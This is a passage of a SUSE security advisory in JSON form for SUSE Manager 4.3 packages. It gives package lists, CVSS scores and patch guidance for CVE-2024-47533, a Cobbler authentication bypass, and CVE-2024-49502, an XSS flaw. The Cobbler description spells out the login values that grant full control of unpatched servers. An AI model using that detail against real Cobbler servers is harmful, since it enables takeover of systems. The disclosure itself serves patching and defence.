"product_id": "SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch"
},
"product_reference": "uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch as component of SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
},
"product_reference": "uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-47533"
}
],
"notes": [
{
"category": "general",
"text": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-47533",
"url": "https://www.suse.com/security/cve/CVE-2024-47533"
},
{
"category": "external",
"summary": "SUSE Bug 1231332 for CVE-2024-47533",
"url": "https://bugzilla.suse.com/1231332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:19:53Z",
"details": "critical"
}
],
"title": "CVE-2024-47533"
},
{
"cve": "CVE-2024-49502",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-49502"
}
],
"notes": [
{
"category": "general",
"text": "A Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027) vulnerability in the Setup Wizard, HTTP Proxy credentials pane in spacewalk-web allows attackers to attack users by providing specially crafted URLs to click.\nThis issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
